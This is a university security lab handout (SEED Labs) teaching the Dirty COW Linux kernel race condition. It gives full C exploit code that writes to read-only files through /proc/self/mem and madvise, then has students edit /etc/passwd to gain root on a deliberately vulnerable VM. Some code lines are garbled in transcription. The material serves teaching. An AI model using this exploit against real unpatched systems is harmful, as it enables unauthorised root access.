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Dirty COW Attack Lab

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1 Lab Overview

The Dirty COW vulnerability is an interesting case of the race condition vulnerability. It existed in the Linux kernel since September 2007, and was discovered and exploited in October 2016. The vulnerability affects all Linux-based operating systems, including Android, and its consequence is very severe: attackers can gain the root privilege by exploiting the vulnerability. The vulnerability resides in the code of copy-on-write inside Linux kernel. By exploiting this vulnerability, attackers can modify any protected file, even though these files are only readable to them. The companion book of the SEED labs, *Computer Security: A Hands-on Approach* by Wenliang Du, has a detailed explanation on this vulnerability (Chapter 8).

The objective of this lab is for students to gain the hands-on experience on the Dirty COW attack, understand the race condition vulnerability exploited by the attack, and gain a deeper understanding of the general race condition security problems. In this lab, students will exploit the Dirty COW race condition vulnerability to gain the root privilege.

Readings and related topics. Detailed coverage of the Dirty COW attack can be found in Chapter 8 of the SEED book, *Computer Security: A Hands-on Approach*, by Wenliang Du.

Lab environment. This lab has been tested on our pre-built Ubuntu 12.04 VM, which can be downloaded from the SEED website. If you are using our SEEDUbuntu 16.04 VM, this attack will not work, because the vulnerability has already been patched in the kernel. You can download the SEEDUbuntu12.04 VM from the SEED web site. If you have an Amazon EC2 account, you can find our VM from the "Community AMIs". The name of the VM is SEEDUbuntu12.04-Generic. It should be noted that Amazon's site says that this is a 64-bit VM; that is incorrect. The VM is 32-bit. However, this incorrect information does not cause any problem.

2 Task 1: Modify a Dummy Read-Only File

The objective of this task is to write to a read-only file using the Dirty COW vulnerability.

2.1 Create a Dummy File

We first need to select a target file. Although this file can be any read-only file in the system, we will use a dummy file in this task, so we do not corrupt an important system file in case we make a mistake. Please create a file called zzz in the root directory, change its permission to read-only for normal users, and put some random content into the file using an editor such as gedit.

```
$ sudo touch /zzz
$ sudo chmod 644 /zzz
$ sudo gedit /zzz
$ cat /zzz
111111222222333333
$ ls -l /zzz
-rw-r--r-- 1 root root 19 Oct 18 22:03 /zzz
$ echo 99999 > /zzz
bash: /zzz: Permission denied
```

From the above experiment, we can see that if we try to write to this file as a normal user, we will fail, because the file is only readable to normal users. However, because of the Dirty COW vulnerability in the system, we can find a way to write to this file. Our objective is to replace the pattern "222222" with " $\star\star\star\star\star\star$ ".

2.2 Set Up the Memory Mapping Thread

You can download the program $cow_attack.c$ from the website of the lab. The program has three threads: the main thread, the write thread, and the madvise thread. The main thread maps /zzz to memory, finds where the pattern "222222" is, and then creates two threads to exploit the Dirty COW race condition vulnerability in the OS kernel.

Listing 1: The main thread

```
/* cow_attack.c (the main thread) */
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/stat.h>
#include <string.h>
void *map;
int main(int argc, char *argv[])
 pthread_t pth1,pth2;
  struct stat st;
  int file_size;
  // Open the target file in the read-only mode.
  int f=open("/zzz", O_RDONLY);
  // Map the file to COW memory using MAP_PRIVATE.
  fstat(f, &st);
  file size = st.st size;
  map=mmap(NULL, file_size, PROT_READ, MAP_PRIVATE, f, 0);
  // Find the position of the target area
  char *position = strstr(map, "2222222");
                                                                   1
  // We have to do the attack using two threads.
  pthread_create(&pth1, NULL, madviseThread, (void *)file_size); @
```

```
pthread_create(&pth2, NULL, writeThread, position);

// Wait for the threads to finish.
pthread_join(pth1, NULL);
pthread_join(pth2, NULL);
return 0;
}
```

In the above code, we need to find where the pattern "222222" is. We use a string function called strstr() to find where "222222" is in the mapped memory (Line ①). We then start two threads: madviseThread (Line ②) and writeThread (Line ③).

2.3 Set Up the write Thread

The job of the write thread listed in the following is to replace the string "222222" in the memory with "*****". Since the mapped memory is of COW type, this thread alone will only be able to modify the contents in a copy of the mapped memory, which will not cause any change to the underlying /zzz file.

Listing 2: The write thread

```
/* cow_attack.c (the write thread) */
void *writeThread(void *arg)
{
   char *content= "*****";
   off_t offset = (off_t) arg;

   int f=open("/proc/self/mem", O_RDWR);
   while(1) {
      // Move the file pointer to the corresponding position.
      lseek(f, offset, SEEK_SET);
      // Write to the memory.
      write(f, content, strlen(content));
   }
}
```

2.4 The madvise Thread

The madvise thread does only one thing: discarding the private copy of the mapped memory, so the page table can point back to the original mapped memory.

Listing 3: The madvise thread

```
/* cow_attack.c (the madvise thread) */

void *madviseThread(void *arg)
{
  int file_size = (int) arg;
  while(1) {
    madvise(map, file_size, MADV_DONTNEED);
  }
}
```

2.5 Launch the Attack

If the write() and the madvise() system calls are invoked alternatively, i.e., one is invoked only after the other is finished, the write operation will always be performed on the private copy, and we will never be able to modify the target file. The only way for the attack to succeed is to perform the madvise() system call while the write() system call is still running. We cannot always achieve that, so we need to try many times. As long as the probability is not extremely low, we have a chance. That is why in the threads, we run the two system calls in an infinite loop. Compile the <code>cow_attack.c</code> and run it for a few seconds. If your attack is successful, you should be able to see a modified / zzz file. Report your results in the lab report and explain how you are able to achieve that.

```
$ gcc cow_attack.c -lpthread
$ a.out
... press Ctrl-C after a few seconds ...
```

3 Task 2: Modify the Password File to Gain the Root Privilege

Now, let's launch the attack on a real system file, so we can gain the root privilege. We choose the /etc/passwd file as our target file. This file is world-readable, but non-root users cannot modify it. The file contains the user account information, one record for each user. Assume that our user name is seed. The following lines show the records for root and seed:

```
root:x:0:0:root:/root:/bin/bash
seed:x:1000:1000:Seed,123,,:/home/seed:/bin/bash
```

Each of the above record contains seven colon-separated fields. Our interest is on the third field, which specifies the user ID (UID) value assigned to a user. UID is the primary basis for access control in Linux, so this value is critical to security. The root user's UID field contains a special value 0; that is what makes it the superuser, not its name. Any user with UID 0 is treated by the system as root, regardless of what user name he or she has. The seed user's ID is only 1000, so it does not have the root privilege. However, if we can change the value to 0, we can turn it into root. We will exploit the Dirty COW vulnerability to achieve this goal.

In our experiment, we will not use the seed account, because this account is used for most of the experiments in this book; if we forget to change the UID back after the experiment, other experiments will be affected. Instead, we create a new account called charlie, and we will turn this normal user into root using the Dirty COW attack. Adding a new account can be achieved using the adduser command. After the account is created, a new record will be added to /etc/passwd. See the following:

```
$ sudo adduser charlie
...
$ cat /etc/passwd | grep charlie
charlie:x:1001:1001:,,,:/home/charlie:/bin/bash
```

We suggest that you save a copy of the /etc/passwd file, just in case you make a mistake and corrupt this file. An alternative is to take a snapshot of your VM before working on this lab, so you can always roll back if the VM got corrupted.

Task: You need to modify the charlie's entry in /etc/passwd, so the third field is changed from 1001 to 0000, essentially turning charlie into a root account. The file is not writable to charlie, but

we can use the Dirty COW attack to write to this file. You can modify the <code>cow_attack.c</code> program from Task 1 to achieve this goal.

After your attack is successful, if you switch user to charlie, you should be able to see the # sign at the shell prompt, which is an indicator of the root shell. If you run the id command, you should be able to see that you have gained the root privilege.

```
seed@ubuntu$ su charlie
Passwd:
root@ubuntu# id
uid=0(root) gid=1001(charlie) groups=0(root),1001(charlie)
```

4 Submission

You need to submit a detailed lab report to describe what you have done and what you have observed. Please provide details using screen shots and code snippets. You also need to provide explanation to the observations that are interesting or surprising.